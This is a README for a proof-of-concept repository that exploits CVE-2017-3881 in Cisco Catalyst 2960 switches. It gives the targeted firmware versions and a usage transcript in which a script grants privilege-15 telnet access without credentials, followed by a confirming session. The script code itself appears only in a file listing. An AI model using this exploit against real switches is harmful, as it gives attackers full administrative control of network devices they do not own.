Cisco Catalyst Remote Code Execution PoC# PoC-CVE-2017-3881
Cisco Catalyst Remote Code Execution PoC
This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability disclosed by Cisco Systems on March 17th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>
Description
-------------
Exploit write-up: https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/
RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. Two firmware versions are supported:
- 12.2(55)SE1 C2960-LANBASEK9-M
- 12.2(55)SE11 C2960-LANBASEK9-M
Denial of service code is available as a metasploit ruby module. This should work for most of the switches mentioned in the Cisco advisory (confirmation needed).
Usage example
-------------
```
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.
catalyst1#show priv
Current privilege level is 15
```
Thanks to Author:
------
Artem Kondratenko https://twitter.com/artkond
[4.0K] /data/pocs/7adafdd1757abca5e31acaeea4a87d51427c7310
├── [2.7K] c2960-lanbasek9-m-12.2.55.se11.py
├── [2.7K] c2960-lanbasek9-m-12.2.55.se1.py
├── [1.5K] CVE-2017-3881-metasploit-module.rb
└── [1.3K] README.md
0 directories, 4 files